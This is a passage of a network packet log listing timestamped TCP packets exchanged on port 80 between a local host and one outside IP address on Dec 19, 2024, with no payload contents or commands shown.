Dec 19, 2024 10:10:12.684014082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.684036970 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.684048891 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.684832096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.684881926 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.684904099 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.685683012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.685724974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.686427116 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.686796904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.686841965 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.686965942 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.687025070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.687720060 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.687772989 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.687911987 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.687959909 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.688800097 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.688859940 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.688949108 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.688992023 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.689640045 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.689656973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.689685106 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.689698935 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.690354109 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.690399885 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.690402985 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.690438032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.691171885 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.691224098 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.691330910 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.691371918 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.692233086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.692285061 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.692331076 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.692378044 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.693264008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.693317890 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.693362951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.693408966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.694293022 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.694340944 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.694468975 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.694518089 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.695431948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.695482016 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.695519924 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.695563078 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.696526051 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.696568012 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.696644068 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.696686983 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.697547913 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.697596073 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.697654963 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.697695971 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.698951960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.699006081 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.699139118 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.699182034 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.700288057 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.700330973 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.700453043 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.700495005 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.701597929 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.701647043 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.701740026 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.701778889 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.702713013 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.702766895 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.702905893 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.702950954 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.703876019 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.703931093 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.704062939 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.704125881 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.704999924 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.705051899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.705209017 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.705255032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.705962896 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.706006050 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.706043959 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.706090927 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.707119942 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.707178116 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.707272053 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.707323074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.708266020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.708316088 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.708441973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.708483934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.709311008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.709362030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.709573984 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.709614992 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.710407972 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.710544109 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.710624933 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.710694075 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.711586952 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.711632013 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.711757898 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.711848021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.712630033 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.712730885 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.712796926 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.712860107 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.713587046 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.713689089 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.713767052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.713851929 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.714709044 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.714752913 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.714840889 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.714879990 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.715562105 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.715611935 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.715655088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.715698004 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.716664076 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.716708899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.716763973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.716803074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.717545033 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.717585087 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.717632055 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.717675924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.718600988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.718641996 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.718736887 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.718775034 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.719518900 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.719563007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.719626904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.719666004 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.720705986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.720745087 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.720877886 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.720912933 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.721637964 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.721678972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.721776962 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.721815109 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.722498894 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.722541094 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.722585917 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.722625017 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.723378897 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.723423958 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.723529100 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.723572016 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.724211931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.724262953 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.724364042 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.724405050 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.724853039 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.724895954 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.725033998 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.725074053 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.725718975 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.725774050 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.725850105 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.725893974 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.726526022 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.726577997 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.726656914 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.726707935 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.727475882 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.727524042 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.727617979 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.727658033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.728631020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.728683949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.728722095 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.728774071 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.729576111 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.729626894 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.729649067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.729686975 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.730422974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.730463982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.730503082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.730541945 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.731389999 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.731435061 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.731509924 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.731550932 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.732304096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.732350111 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.732424021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.732462883 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.733292103 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.733354092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.733361006 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.733407021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.734302998 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.734353065 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.734482050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.734553099 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.735275030 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.735318899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.735439062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.735481024 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.736196041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.736238956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.876590014 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.876624107 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.876667023 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.876686096 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.876914978 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.876935959 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.876957893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.876969099 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.877365112 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.877408981 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.877444029 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.877484083 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.878107071 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.878145933 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.878262043 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.878302097 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.879065990 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.879106998 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.879192114 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.879230976 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.879781961 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.879825115 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.879872084 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.879913092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.880619049 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.880665064 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.880727053 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.880764961 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.881617069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.881656885 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.881696939 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.881736994 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.882483006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.882520914 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.882662058 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.882699966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.883591890 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.883631945 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.883677959 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.883714914 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.884639025 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.884656906 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.884686947 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.884686947 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.885565042 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.885623932 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.885746002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.885785103 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.886543989 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.886583090 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.886730909 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.886770964 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.887497902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.887537956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.887590885 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.887629986 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.888271093 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.888318062 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.888355970 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.888396978 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.889127970 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.889179945 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.889225006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.889264107 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.889920950 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.889962912 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.889967918 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.890007973 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.890707016 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.890747070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.890851974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.890896082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.891557932 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.891606092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.891613960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.891658068 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.892548084 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.892592907 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.892640114 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.892678976 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.893538952 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.893579006 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.893666983 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.893713951 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.894520998 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.894561052 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.894685030 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.894723892 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.895607948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.895649910 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.895688057 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.895730019 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.896567106 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.896610975 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.896658897 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.896697044 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.897521973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.897562981 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.897687912 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.897726059 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.898514032 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.898555994 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.898607969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.898647070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.899585962 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.899626970 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.899672985 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.899710894 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.900644064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.900684118 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.900728941 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.900795937 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.901902914 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.901941061 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.901947975 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.901978016 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.902560949 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.902601957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.902638912 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.902688026 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.903477907 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.903518915 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.903557062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.903599977 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.904756069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.904774904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.904807091 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.904825926 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.905538082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.905580044 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.905632973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:12.905670881 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:12.906477928 CET	80	49860	185.215.113.16	192.168.2.6
